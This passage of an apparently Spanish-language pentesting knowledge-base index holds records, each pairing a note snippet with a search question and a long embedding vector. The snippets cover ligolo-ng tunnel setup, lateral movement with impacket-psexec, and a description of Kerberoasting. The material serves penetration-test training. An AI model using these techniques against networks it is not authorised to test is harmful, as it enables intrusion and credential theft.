-0.00542, 0.0494, -0.03865, -0.08255, -0.09939, -0.11618, 0.16569, 0.04288, -0.09899, -0.11309, -0.02672, 0.04002, -0.0526, 0.00487, 0.05264, -0.15934, -0.07225, -0.14269, 0.05447, 0.00458, 0.09918, -0.04414, -0.04435, -0.07537, 0.03402, 0.06123, -0.11071, -0.03474, -0.03783, -0.02124, -0.09024, 0.14932, 0.00033, -0.01548, -0.03101, -0.03367, -0.03148, -0.06564, 0.03239, -0.00537, -0.08954, -0.04048, 0.05626, -0.0673, 0.11488, -0.08411, 0.06943, -0.06064, 0.09786, 0.0324, 0.01699, 0.12033, 0.09518, -0.06053, -0.00931, 0.0205, -0.08551, -0.06613, -0.04427, -0.02592, -0.06843, 0.05231, 0.0431, 0.07616, -0.04777, 0.05891, 0.12024, 0.06627, 0.07774, -0.00374, -0.0598, 0.00978, -0.09147, -0.02884, 0.03087, -0.00735, 0.03661, -0.0833, -0.04696, -0.03846, 0.02543, 0.06775, 0.05346, -0.0296, 0.01625, 0.08149, 0.0092, 0.05601, 0.09409, -0.0654, -0.11454, 0.16004, 5e-05, 0.08435, -0.00221, -0.15832, 0.04775, -0.00314, 0.03067, 0.09752, 0.0054, -0.08851, -0.04415, -0.01127, -0.01461, -0.00717, -0.06098, -0.10631, -0.01537, -0.02112, -0.03623, -0.00706, 0.04896, -0.00533, -0.0349, 0.11937, 0.03696, 0.10414, -0.04113, -0.01376, -0.05199, -0.0346, -0.08395, 0.00472, -0.0453, 0.04054, 0.01624, -0.05162, 0.01357, -0.00583, -0.02698, -0.08165, 0.08866, 0.02436, -0.0936, -0.12839, -0.09444, 0.02647, -0.04012, -0.02165, -0.00172, 0.00901, -0.01873, -0.00207, 0.02885, -0.07857, -0.02914, 0.10016, -0.00015, 0.03269, -0.06367, -0.04826, 0.04586, -0.10546, -0.05519, -0.04673, 0.08873, -0.02978, -0.00822, 0.03513, 0.00568, 0.00435, 0.00934, -0.0318, -0.02048, -0.06643, 0.08853, 0.01374, -0.03805, -0.07583, 0.00378, 0.05225, -0.03409, -0.07124, -0.02588, -0.04876, -0.00941, 0.02905, -0.00984, 0.01884, -0.00967, -0.01056, 0.01728, -0.06072, 0.0357, -0.04215, 0.06939, -0.04211, -0.07562, -0.02899, 0.03666, -0.08051, 0.04571, 0.01717, -0.05885, 0.01573, 0.01968, 0.07299, 0.10209, -0.08576, 0.02208, -0.01193, 0.0223, 0.00875, 0.08586, 0.01511, -0.01202, 0.02908, 0.0354, 0.03041, 0.01614, -0.03057, -0.02576, 0.05589, 0.01639, 0.02415, -0.03444, 0.00794, -0.02338, 0.0098, -0.03646, -0.01891, 0.05477, 0.04913, 0.00205, -0.00923, -0.04428, -0.07907, 0.01977, 0.09511, 0.05091, 0.02261, -0.1008, -0.04333, -0.08523, 0.04355, -0.00057, -0.07004, -0.03928, 0.04747, 0.07912, -0.01291, 0.02031, -0.05959]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kali (proxy):\nsudo ip tuntap add user $USER mode tun ligolo && sudo ip link set ligolo up\n./proxy -selfcert", "indexar": "que programa puedo usar para crear mi propio proxy local sin certificado?", "v": [0.01166, 0.11301, -0.26942, -0.11805, 0.09599, -0.10944, 0.03842, -0.0317, -0.1318, -0.14754, -0.04847, 0.02609, 0.00697, -0.13386, -0.06554, -0.03449, 0.07456, -0.10325, 0.07208, 0.08216, 0.0, -0.06359, -0.04818, -0.09195, 0.05013, 0.05322, 0.12197, -0.05942, -0.06429, -0.0497, 0.03772, 0.13209, 0.08803, -0.04374, 0.00627, -0.04923, 0.04799, 0.05292, -0.02122, 0.06645, 0.10456, -0.06311, 0.00993, 0.1507, 0.05902, -0.01393, 0.06449, -0.10283, -0.0798, -0.00442, -0.0596, -0.17525, -0.12889, 0.03255, 0.04051, -0.08628, -0.03473, -0.20139, 0.00261, -0.02056, -0.08149, -0.08236, 0.04824, -0.0502, 0.05162, -0.01457, 0.0625, 0.07366, -0.17336, 0.0196, -0.03316, -0.03458, 0.07002, -0.06908, 0.00151, 0.02328, -0.05976, -0.08783, 0.12511, -0.04445, 0.03903, 0.00023, 0.08113, -0.07657, -0.1116, -0.02503, -0.03726, -0.04843, 0.13935, -0.05385, 0.01182, 0.03262, 0.0462, -0.01786, 0.06678, -0.06918, 0.10862, -0.00606, -0.0205, 0.02792, 0.0559, -0.04616, -0.02548, 0.08005, 0.02231, 0.01105, 0.05584, 0.02723, 0.00048, 0.07224, 0.03719, -0.00121, -0.08028, -0.05428, -0.02345, -0.00714, -0.02535, -0.00224, 0.04703, 0.00781, 0.00037, -0.05306, -0.08132, -0.00565, 0.03061, 0.00989, -0.07798, 0.09995, -0.07023, 0.09329, 0.00462, -0.03692, -0.01896, -0.13673, -0.05129, 0.00513, 0.00669, -0.08765, -0.02898, -0.0411, -0.03154, 0.03261, 0.00349, 0.00081, 0.02855, 0.0561, -0.09523, -0.06777, -0.0013, 0.01367, -0.07215, 0.01918, -0.01867, 0.07926, -0.14692, -0.00506, 0.06901, -0.06083, 0.02691, 0.05206, -0.05159, 0.00468, -0.00186, 0.01091, 0.04393, -0.02206, -0.02349, 0.01139, 0.0708, 0.07453, -0.02261, 0.08311, 0.0077, -0.08049, 0.06478, -0.03561, 0.01692, -0.09563, -0.01013, -0.01224, -0.00961, 0.0367, 0.02306, -0.04345, 0.00112, -0.02503, 0.01961, 0.05752, 0.04507, 0.06235, -0.06895, 0.01669, 0.00186, 0.03698, -0.04959, -0.04161, 0.00087, -0.06999, 0.02225, -0.09171, -0.04043, -0.0218, -0.03545, -0.00433, 0.06293, 0.04887, -0.0202, 0.01315, 0.05889, 0.08649, 0.00949, -0.06264, 0.05483, 0.045, -0.0201, 0.01224, 0.00101, -0.02269, -0.01728, 0.00148, 0.0311, 0.00975, 0.02879, 0.03915, 0.02628, -0.04306, 0.02809, -0.00884, 0.03245, 0.06096, 0.01493, -0.01247, -0.06212, -0.04322, 0.03803, -0.00235, 0.04848, -0.02855, -0.01056, -0.0543, -0.02024, 0.10207, -0.01902, -0.07908, -0.04278, 0.02214, -0.06464, 0.00282, -0.02319, -0.01982, -0.01094, 0.00737, 0.04608, -0.02721, 0.02205, 0.0696]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kali (proxy):\nsudo ip tuntap add user $USER mode tun ligolo && sudo ip link set ligolo up\n./proxy -selfcert", "indexar": "con que herramienta montan un proxy de tunneling simple en Linux?", "v": [0.03143, -0.00714, -0.17839, -0.17393, -0.11508, -0.02353, -0.18917, 0.08664, 0.01335, 0.04801, -0.03865, 0.02119, 0.15729, 0.02364, -0.03075, -0.04527, -0.01719, -0.16248, 0.04572, -0.03982, -0.20871, 0.03113, -0.1614, -0.06092, 0.10232, -0.0173, 0.06973, -0.08128, -0.07953, -0.04787, -0.04172, 0.00837, 0.07212, 0.09475, -0.04932, -0.06455, 0.0097, 0.13015, 0.08252, 0.05805, 0.04384, -0.14082, -0.04708, 0.078, -0.06203, -0.15145, 0.01425, -0.05868, 0.02412, -0.06794, -0.00093, -0.13973, -0.16451, -0.00757, 0.1062, -0.06849, 0.11611, -0.14158, 0.0888, -0.01538, -0.11402, 0.00036, -0.07585, -0.0388, 0.03675, 0.05402, -0.01412, -0.11111, -0.20991, 0.06369, 0.01527, 0.03011, 0.00414, 0.05081, 0.01625, -0.0181, -0.05291, -0.04286, 0.04488, 0.05382, 0.07412, 0.0068, 0.03058, 0.04892, -0.07534, -0.12705, -0.02042, -0.01473, 0.04976, 0.00381, -0.07698, 0.05503, 0.04064, 0.02968, 0.12213, -0.01053, 0.07741, 0.03455, -0.01682, -0.12075, 0.01363, 0.02024, -0.08323, 0.15134, 0.01913, -0.00895, -0.02168, -0.02916, -0.08592, -0.00863, 0.11233, 0.01966, 0.04907, -0.04888, -0.05822, -0.03892, -0.03919, 0.01727, -0.02667, -0.02974, 0.03868, 0.01769, -0.07927, 0.02536, -0.0599, -0.05093, -0.03261, 0.11625, -0.0116, -0.03312, 0.06338, -0.05462, -0.05792, 0.01483, -0.048, 0.08235, 0.05005, -0.14477, -0.00183, -0.02952, 0.00185, 0.01592, -0.02992, -0.05428, 0.08047, 0.00881, -0.04422, -0.05482, 0.02177, -0.06003, -0.02143, -0.03094, 0.00226, -0.00458, -0.0593, -0.06622, -0.02007, 0.04807, -0.04989, 0.03961, -0.01631, -0.06165, 0.03277, 0.0008, -0.016, -0.00987, 0.00103, -0.02229, 0.04585, -0.00607, 0.05706, 0.04075, 0.0027, -0.03555, 0.00164, -0.07977, -0.03021, -0.04471, 0.00611, 0.00902, 0.00257, -0.06371, 0.0057, -0.01595, 0.02583, -0.02384, 0.00825, 0.01139, 0.00424, 0.07151, -0.01895, 0.03393, -0.01268, -0.03304, -0.00212, -0.00504, -0.01987, -0.05561, 0.03686, 0.0008, -0.05667, -0.00908, 0.00273, -0.06686, -0.02038, 0.01543, -0.02299, -0.01569, 0.00594, 0.07014, 0.07685, -0.00738, 0.00286, 0.00177, 0.06915, -0.0151, 0.05835, 0.08819, -0.04242, 0.00351, -0.00946, 0.0371, 0.07773, -0.00411, -0.04519, -0.02423, -0.02568, 0.02695, -0.04693, -0.02393, 0.06883, -0.02302, -0.03762, 0.02181, 0.00541, -0.02799, 0.01499, 0.02805, -0.01098, 0.02549, -0.04254, 0.0571, 0.03888, -0.03165, -0.09183, -0.00228, 0.04147, 0.00043, -0.06041, -0.06848, -0.04564, -0.01344, -0.0196, -0.02812, 0.00773, -0.003]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\n```bash\nimpacket-psexec admin@192.168.5.10 # el trΓ‘fico va por el tΓΊnel, transparente\n```\nAhora Movimiento lateral y Active Directory funcionan contra la red interna.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "que programa puedo usar para moverme lateralmente en una red interna con Active Directory", "v": [-0.0591, 0.09085, -0.15404, -0.24617, -0.11011, 0.02006, -0.12269, 0.09391, -0.13994, -0.09077, -0.08471, -0.16367, 0.01496, -0.11008, 0.03111, 0.02933, 0.07558, -0.09445, -0.04018, -0.05019, 0.01114, 0.00267, -0.07326, 0.00111, 0.12467, 0.18099, 0.05605, -0.06606, -0.03367, -0.08823, -0.05501, 0.02408, 0.12108, -0.06001, 0.01189, -0.11042, 0.01616, -0.01552, 0.09319, 0.08085, -0.0563, 0.04965, -0.18776, 0.07183, 0.10074, 0.14136, 0.0159, -0.11866, -0.00665, 0.06976, -0.0045, -0.02749, -0.02684, -0.08559, 0.02812, -0.07005, -0.00876, -0.10814, -0.13545, -0.05483, 0.02354, 0.04295, -0.08514, 0.03389, -0.03265, -0.09022, 0.11269, -0.02438, -0.10808, 0.03548, 0.02279, 0.05222, -0.01079, 0.13351, 0.00236, 0.08552, 0.01192, -0.08655, -0.00294, 0.04653, 0.0092, 0.11581, 0.00487, 0.08028, -0.05246, -0.12484, 0.08118, -0.11521, 0.03756, 0.00676, 0.09108, 0.01076, -0.03276, 0.02876, 0.04686, 0.03761, 0.00428, 0.06379, 0.01252, -0.0338, 0.05893, -0.03211, 0.00835, 0.04194, 0.0037, 0.03394, 0.05962, 0.02725, -0.00196, 0.07055, 0.03485, -0.03669, -0.0388, -0.06644, -0.02136, 0.04763, -0.09254, -0.01343, 0.02191, -0.02333, -0.0429, -0.04025, -0.01541, -0.03744, 0.06338, -0.07009, -0.02822, 0.05158, -0.08751, 0.11194, 0.01392, 0.02409, 0.02518, -0.16705, -0.11045, -0.05927, 0.01204, 0.03239, 0.08602, -0.05843, -0.01318, 0.00043, -0.02907, 0.0016, 0.01501, 0.06676, 0.05406, 0.01258, 0.02543, 0.06234, 0.03924, -0.01214, 0.02913, -0.0026, -0.02031, 0.07435, 0.03754, 0.00951, -0.09996, 0.02137, -0.046, 0.02252, -0.07155, -0.06177, 0.02186, -0.09833, -0.03053, 0.00479, 0.05986, 0.0762, -0.00437, 0.11233, -0.00252, -0.06654, 0.01231, -0.0176, -0.05253, -0.06134, 0.03148, -0.03715, 0.04225, 0.03113, 0.02126, -0.00457, 0.01589, -0.01512, -0.00462, -0.01103, -0.0214, -0.00106, -0.04947, 0.06854, 0.02635, 0.00408, -0.01356, -0.00732, 0.02643, -0.01234, 0.03987, -0.08487, -0.06005, 0.02362, 0.03238, -0.00811, 0.05367, 0.03253, -0.03499, 0.08193, 0.08482, 0.078, -0.01059, -0.02733, 0.10974, 0.07052, -0.09131, -0.00104, -0.01089, 0.02876, 0.00051, 0.00716, 0.03884, 0.00635, -0.00065, 0.01281, 0.02674, -0.02126, -0.00463, -0.04249, -0.03997, 0.04536, 0.03951, -0.02306, 0.0266, -0.02672, -0.0079, -0.02629, 0.04605, 0.00251, -0.00715, -0.03064, -0.02836, 0.0429, -0.00047, 0.0046, -0.02182, -0.00192, -0.06084, 0.04388, 0.01298, -0.00895, -0.00497, 0.00402, 0.01546, -0.08785, 0.01991, 0.0926]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\n```bash\nimpacket-psexec admin@192.168.5.10 # el trΓ‘fico va por el tΓΊnel, transparente\n```\nAhora Movimiento lateral y Active Directory funcionan contra la red interna.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "cual es una herramienta que me permita ejecutar comandos a travΓ©s del tΓΊnel sin verlo", "v": [0.09756, 0.01272, -0.18162, -0.0942, 0.08286, 0.00975, 0.0152, -0.00137, 0.00805, -0.08122, -0.11168, 0.04202, 0.07879, 0.00549, -0.02995, 0.13288, 0.07706, -0.09094, 0.11356, 0.00744, -0.01188, -0.09005, -0.06106, -0.02183, -0.04834, -0.00163, 0.04271, -0.07846, -0.16088, -0.1736, -0.0006, -0.00624, 0.11533, -0.10259, 0.02707, -0.03848, -0.09645, 0.13239, -0.07472, 0.10834, -0.09009, 0.00845, -0.17181, 0.10118, 0.00893, -0.10247, -0.01298, -0.05165, 0.06173, -0.03814, 0.00685, -0.05795, -0.17928, -0.02342, 0.04652, -0.12037, 0.24223, -0.03314, 0.03884, -0.10792, 0.01161, -0.0983, 0.05011, 0.10129, -0.00786, -0.02838, 0.02316, -0.09735, -0.09007, 0.0381, -0.09957, 0.05043, -0.05236, 0.12839, -0.02427, -0.04349, -0.06349, 0.04703, 0.11036, -0.00213, 0.03416, -0.02373, -0.04779, 0.06233, -0.07521, -0.05218, -0.04018, 0.02342, 0.01759, -0.04607, -0.09066, 0.00297, 0.03227, 0.09826, 0.11021, 0.0005, -0.0, 0.00647, 0.00308, -0.01335, 0.10862, -0.05923, -0.14895, 0.14146, 0.05334, 0.05893, -0.01726, -0.07258, -0.00896, 0.01473, 0.04379, 0.0661, 0.05064, -0.07783, -0.02253, 0.0056, -0.02152, -0.05987, -0.02556, -0.13554, -0.04077, 0.04112, -0.04307, -0.00843, -0.00787, -0.04667, -0.0594, 0.06896, 0.07951, 0.00926, -0.05223, 0.00785, 0.03518, -0.05423, -0.01204, 0.05753, 0.00589, -0.05836, -0.00046, -0.09594, 0.04587, -0.01702, -0.01675, -0.06376, 0.06488, 0.00663, -0.0544, -0.13851, -0.04815, 0.00587, 0.02113, -0.00833, -0.04038, 0.02041, -0.03253, -0.06688, -0.03426, 0.0201, -0.06135, 0.0839, -0.00779, 0.00371, -0.0025, -0.03252, 0.02077, -0.06338, -0.03819, 0.00498, 0.01259, -0.01141, -0.00111, 0.00178, -0.00801, 0.02054, 0.04063, -0.11154, -0.01543, -0.03305, 0.03997, -0.0202, -0.02019, -0.03354, -0.04014, 0.03045, -0.0133, -0.10272, 0.00826, -0.05365, 0.01934, 0.04391, -0.00224, 0.03834, -0.00046, -0.07535, 0.01901, -0.00603, 0.01586, -0.05917, 0.03489, -0.06535, -0.07267, -0.02166, 0.03538, -0.08986, 0.01161, 0.03951, -0.01972, -0.00946, -0.04895, 0.04868, 0.1042, -0.03426, 0.02245, -0.03735, -0.00308, -0.01511, 0.03776, 0.02266, -0.04574, 0.00872, 0.06693, -0.0066, 0.08815, -0.03202, -0.01909, 0.00281, 0.00548, 0.01248, -0.04128, -0.01639, -0.0049, -0.02504, -0.05741, -0.03986, 0.06863, -0.00958, -0.00111, -0.0116, -0.0181, -0.0702, 0.03058, 0.07753, 0.01772, -0.03723, -0.04755, -0.01833, -0.03573, -0.01081, -0.05273, -0.06333, 0.00903, 0.04417, 0.04179, -0.07258, 0.04165, -0.07534]} +{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\n```bash\nimpacket-psexec admin@192.168.5.10 # el trΓ‘fico va por el tΓΊnel, transparente\n```\nAhora Movimiento lateral y Active Directory funcionan contra la red interna.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "como monto un movimiento lateral usando el trΓ‘fico transparente contra una IP", "v": [-0.02844, -0.00263, -0.23223, -0.17364, -0.20133, -0.0627, -0.06148, 0.06997, -0.1262, -0.03915, 0.06967, -0.07348, 0.0712, 0.08212, 0.02004, -0.01382, 0.08663, -0.05215, 0.03641, -0.19016, -0.11297, -0.02995, -0.009, -0.15786, 0.1041, 0.06958, -0.12653, -0.01842, -0.07424, -0.14701, -0.09229, -0.00106, 0.10223, 0.03851, -0.04991, -0.16943, 0.02965, 0.06648, 0.03569, -0.02479, 0.01016, -0.08467, -0.11319, -0.00808, -0.06084, 0.02695, -0.01498, -0.04593, -0.08689, -0.05666, -0.01175, -0.04813, -0.08162, -0.08238, -0.0874, -0.02519, 0.03042, -0.01873, -0.00568, -0.04219, 0.07781, 0.12875, -0.00024, 0.0057, -0.05202, -0.16093, -0.04354, -0.005, -0.09547, -0.11608, 0.11198, 0.06353, -0.02693, 0.14997, 0.05724, 0.09049, 0.04855, -0.0167, -0.02782, 0.02823, -0.03309, 0.15156, -0.13411, 0.01206, -0.0618, -0.11376, 0.03017, -0.12903, 0.09097, 0.10653, -0.02736, 0.09074, -0.03758, -0.02938, 0.02668, 0.10974, -0.10367, 0.01377, -0.05523, -0.03004, 0.06031, 0.04259, -0.12867, -0.05284, 0.16477, 0.03729, 0.05974, -0.04047, 0.03497, -0.00898, -0.01001, 0.03849, -0.04615, -0.02827, 0.07762, -0.00876, -0.0677, -0.01879, -0.07816, 0.03791, 0.05603, -0.01491, -0.09428, -0.02477, -0.01852, -0.01138, -0.03439, 0.06697, -0.09035, 0.00112, 0.11014, 0.03601, -0.09352, -0.09736, -0.04741, -0.04141, 0.03028, 0.0349, 0.05889, 0.07884, 0.0909, -0.02543, -0.00899, 0.00987, 0.05132, -0.00191, 0.00933, -0.0464, -0.0287, 0.04234, -0.01449, 0.00917, -0.00794, -0.00335, 0.00611, 0.0601, -0.0477, -0.05373, -0.08685, 0.00533, -0.03212, 0.07368, 0.00374, 0.00762, 0.03827, -0.02032, -0.04948, 0.04084, 0.0306, -0.00624, 0.01097, 0.00666, -0.01141, -0.03083, -0.02452, -0.02705, -0.0637, 0.02004, 0.02199, -0.02673, 0.00842, -0.03008, 0.00037, 0.02131, 0.02397, -0.02172, 0.03905, 0.02629, 0.02255, 0.03453, 0.01201, 0.0466, -0.03273, 0.00866, -0.01285, -0.03909, -0.03832, -0.07571, 0.06557, -0.01954, -0.03751, -0.03252, 0.03108, -0.00853, 0.00534, -0.00591, -0.03252, 0.03429, 0.03714, 0.01042, 0.03431, -0.02639, 0.06936, -0.00379, -0.04129, 0.02919, 0.0001, -0.00346, -0.02699, 0.00761, 0.02767, 0.0463, -0.01015, -0.01438, 0.0278, 0.03306, -0.00564, 0.00951, -0.02632, 0.01517, -0.01261, 0.05616, -0.03774, -0.02865, 0.01858, 0.01181, 0.00094, 0.01355, -0.02751, -0.04105, 0.00271, -0.02964, -0.02482, -0.04366, -0.02234, -0.03897, -0.05287, 0.06474, 0.02505, -0.05563, 0.00136, 0.02624, 0.00814, -0.03252, 0.00782, 0.00784]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberoasting\n\n> Pides el **TGS** de cuentas de servicio (las que tienen **SPN**) y crackeas su hash offline. Uno de los 7 caminos de Active Directory.", "indexar": "que tecnica sirve para rolear hashes de cuentas de servicio en Active Directory", "v": [0.12721, 0.0019, -0.08635, -0.22875, 0.10089, -0.19381, -0.05842, -0.06729, -0.01086, 0.15081, -0.12981, -0.12307, -0.05207, -0.04198, 0.12324, -0.03314, 0.0978, -0.08057, -0.0003, -0.01689, -0.00026, 0.03985, -0.15078, 0.07779, 0.00185, 0.00354, 0.0484, -0.08023, -0.1777, 0.02886, 0.06677, -0.05753, -0.00341, 0.00021, 0.03888, 0.0054, -0.12197, 0.04539, 0.07757, 0.10242, -0.08553, 0.05096, -0.07704, 0.09506, 0.12277, 0.05532, 0.02733, -0.01353, 0.04219, 0.12325, 0.02702, -0.05561, -0.14286, 0.06211, -0.04719, -0.04103, -0.01754, -0.03265, -0.17079, -0.12832, -0.06536, -0.09233, 0.02049, -0.04358, -0.04084, -0.10362, 0.09126, -0.04423, -0.0457, 0.00833, -0.11625, 0.08051, 0.02834, 0.08712, -0.05959, -0.05303, 0.00561, -0.08822, -0.12648, 0.01871, 0.09721, -0.0723, -0.03644, 0.07198, -0.10408, -0.05769, 0.01972, -0.05843, 0.09376, -0.04691, 0.06948, 0.03334, -0.08464, 0.07336, -0.00903, 0.13622, 0.02549, 0.03543, 0.03496, -0.05246, 0.03424, -0.02568, -0.05061, 0.105, -0.04841, 0.13405, 0.06051, -0.0214, 0.00893, -0.00957, 0.01291, -0.04644, -0.06325, -0.01586, 0.01138, 0.09956, -0.05613, -0.01494, 0.02478, 0.09413, -0.02321, -0.07556, 0.1513, 0.08369, -0.00421, -0.05943, -0.03453, -0.00095, 0.08066, 0.02924, -0.00256, 0.03282, -0.05848, -0.025, 0.06121, -0.03394, 0.05684, -0.00622, -0.0282, -0.05379, -0.01168, 0.05537, -0.0005, -0.07225, 0.02414, 0.01246, 0.13429, -0.02586, -0.03979, 0.00899, 0.08885, -0.01853, -0.05898, 0.06062, -0.00869, -0.01036, 0.01348, -0.05814, -0.05644, 0.04489, -0.04664, -0.06473, 0.00243, -0.01165, -0.01638, -0.03064, -0.06724, -0.02253, 0.08289, 0.04629, -0.07603, 0.03769, 0.02027, -0.10775, 0.01876, -0.03669, -0.02376, 0.00315, 0.01395, 0.00662, -0.01779, -0.07402, 0.02703, 0.01246, 0.02164, -0.01113, 0.00476, -0.06255, 0.01119, -0.02132, -0.00958, -0.00255, -0.06287, 0.00213, -0.06817, -0.03819, 0.02438, -0.00048, -0.00951, -0.11447, 0.03904, 0.09236, 0.01611, 0.0026, -0.00036, 0.04311, -0.00896, 0.07416, 0.00899, -0.00648, -0.02121, -0.02398, 0.07743, 0.01229, -0.04158, -0.01013, 0.05122, -0.03431, 0.00686, 0.09587, -0.01079, -0.04077, 0.00794, -0.02828, 0.01861, 0.0057, 0.03717, -0.02531, 0.02135, -0.00543, -0.0027, 0.02245, -0.01371, 0.02047, -0.0144, 0.01499, 0.03791, -0.0137, 0.0038, -0.03784, -0.00319, 0.03115, -0.00656, -0.003, -0.04417, -0.02735, -0.04659, 0.03336, -0.01786, -0.05867, -0.00405, 2e-05, 0.01504, 0.01402, 0.02259, -0.02198]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberoasting\n\n> Pides el **TGS** de cuentas de servicio (las que tienen **SPN**) y crackeas su hash offline. Uno de los 7 caminos de Active Directory.", "indexar": "como puedo obtener el TGS de cuentas con SPN y crackear sus hashes", "v": [0.02964, -0.16923, -0.12693, -0.00122, 0.1643, -0.15974, -0.01671, -0.04903, 0.00173, 0.21802, -0.17537, 0.13945, 0.01418, -0.03436, 0.01638, 0.08303, -0.03517, 0.00113, 0.00719, 0.17032, -0.00554, -0.10265, -0.0855, -0.05205, 0.04585, -0.01767, -0.0395, 0.05398, -0.18956, 0.0345, -0.01195, -0.01995, -0.08646, -0.03499, -0.06165, 0.04415, -0.04962, 0.14505, 0.17787, 0.06089, 0.02697, -0.00668, -0.04603, 0.03763, 0.03029, -0.11418, 0.0005, 0.11384, 0.01215, -0.04018, 0.0035, 0.01826, -0.23268, 0.06361, -0.16111, -0.07216, 0.08567, 0.01444, -0.15989, 0.02809, -0.08173, 0.0277, 0.01578, -0.02403, -0.11665, -0.08973, 0.05549, 0.0586, -0.04762, 0.00291, -0.06965, 0.10972, -0.02138, -0.05975, 0.02074, -0.02539, 0.01789, -0.07573, 0.02315, 0.03716, 0.01929, -0.10167, 0.03308, 0.08585, -0.12406, 0.04897, -0.05758, -0.05994, 0.07824, -0.00767, -0.05236, 0.0361, -0.07215, 0.08399, 0.00967, 0.01674, 0.05925, -0.02599, -0.04708, -0.04927, -0.06328, -0.04483, -0.10163, 0.04192, -0.10099, 0.04368, 0.06177, -0.05941, 0.08125, 0.0108, 0.10182, 0.01902, -0.09295, 0.06256, -0.07422, 0.0113, -0.0755, -0.0392, -0.00062, 0.02552, -0.03626, -0.10966, 0.00982, 0.06425, 0.01905, -0.037, -0.06412, 0.0553, -0.00733, -0.0338, 0.00326, 0.00446, -0.02876, -0.01697, 0.02284, -0.01088, -0.01388, -0.06048, -0.00536, -0.01288, -0.02829, 0.07528, 0.04146, -0.05403, 0.09504, -0.03889, -0.03581, -0.02408, -0.01866, 0.01145, 0.12458, -0.02577, -0.0207, -0.01345, -0.05855, 0.01307, 0.02706, -0.04183, 0.01622, 0.0563, -0.09148, 0.01152, 0.01399, 0.02624, -0.01478, -0.02382, -0.00349, -0.02543, 0.04146, -0.03022, -0.04168, 0.02183, 0.0299, -0.04902, -0.00145, -0.12351, 0.00962, -0.03013, -0.03456, -0.09126, -0.04741, -0.00814, -0.01923, -0.04227, -0.05119, -0.00933, 0.04684, -0.0304, 0.00959, -0.04238, 0.0209, 0.02924, -0.01603, 0.00387, -0.02472, -0.01315, 0.06457, 0.01849, 0.00905, -0.06061, -0.04448, 0.04274, -0.00287, -0.03498, 0.06155, 0.06448, -0.01092, 0.09354, -0.02138, 0.028, 0.06599, -0.06897, 0.02729, -0.04458, -0.05746, 0.02684, -0.02021, 0.01827, -0.01721, 0.06135, -0.05422, 0.03404, 0.09566, 0.00988, -0.00588, -0.0514, 0.01194, 0.05031, 0.01117, 0.05469, -0.00902, 0.07292, 0.01994, -0.01106, 0.03038, 0.06397, -0.0063, -0.00457, 0.00943, 0.02869, -0.02638, 0.02244, 0.028, -0.00685, -0.01251, -0.00921, -0.06345, 0.00937, -0.01424, -0.0618, 0.00348, 0.03557, 0.01722, 0.01526, -0.03195, 0.01436]} +{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberoasting\n\n> Pides el **TGS** de cuentas de servicio (las que tienen **SPN**) y crackeas su hash offline. Uno de los 7 caminos de Active Directory.", "indexar": "cual es una herramienta para realizar kerberoasting contra dominios", "v": [0.09963, -0.13309, -0.00799, 0.01079, 0.0292, -0.09335, 0.04249, 0.1261, -0.15324, -0.04849, -0.09394, -0.07851, -0.02193, -0.21512, 0.06225, 0.01047, 0.1664, -0.06772, -0.01296, 0.01772, -0.02001, -0.00688, -0.00377, 0.0094, -0.02316, -0.1006, 0.02023, -0.13141, -0.19662, 0.19232, -0.02866, -0.01888, 0.04788, -0.03902, -0.03439, -0.10447, -0.07168, 0.1226, 0.0595, 0.11617, 0.04844, 0.01974, -0.09855, 0.08648, -0.13602, -0.01697, -0.09208, -0.06985, 3e-05, -0.03032, 0.02548, -0.06062, -0.13205, -0.01819, 0.05118, -0.12373, 0.25793, -0.13054, -0.00172, -0.07613, -0.11679, -0.03049, -0.07564, -0.03754, -0.06344, -0.16166, -0.01092, -0.04403, 0.01838, 0.07486, 0.02408, 0.08132, 0.09632, 0.04555, 0.02926, 0.03017, 0.06271, 0.00293, 0.01144, -0.09411, 0.02148, -0.0104, -0.0954, 0.07431, -0.05037, -0.20162, -0.02035, -0.09092, 0.02185, -0.0431, -0.04358, 0.0827, -0.06938, -0.06051, -0.0104, -0.07106, 0.02139, 0.00304, -0.0608, -0.01619, 0.11815, 0.03805, -0.14762, 0.06394, 0.05053, 0.03874, -0.10033, -0.03235, -0.06974, -0.01403, 0.00343, -0.04166, 0.00737, 0.00076, -0.01767, 0.10165, -0.0856, 0.00226, 0.04031, -0.0455, -0.03723, 0.02719, -0.03408, -0.04056, 0.01566, -0.00335, 0.0229, -0.02696, -0.03943, -0.12009, 0.02991, -0.03837, -0.04966, 0.01982, -0.05571, 0.04578, 0.01176, -0.08241, -0.02165, -0.04378, -0.00249, 0.00573, -0.01323, -0.0444, -0.01217, -0.04018, 0.00512, -0.0551, -0.03507, 0.00073, -0.0233, -0.05596, -0.05523, 0.04947, -0.00525, 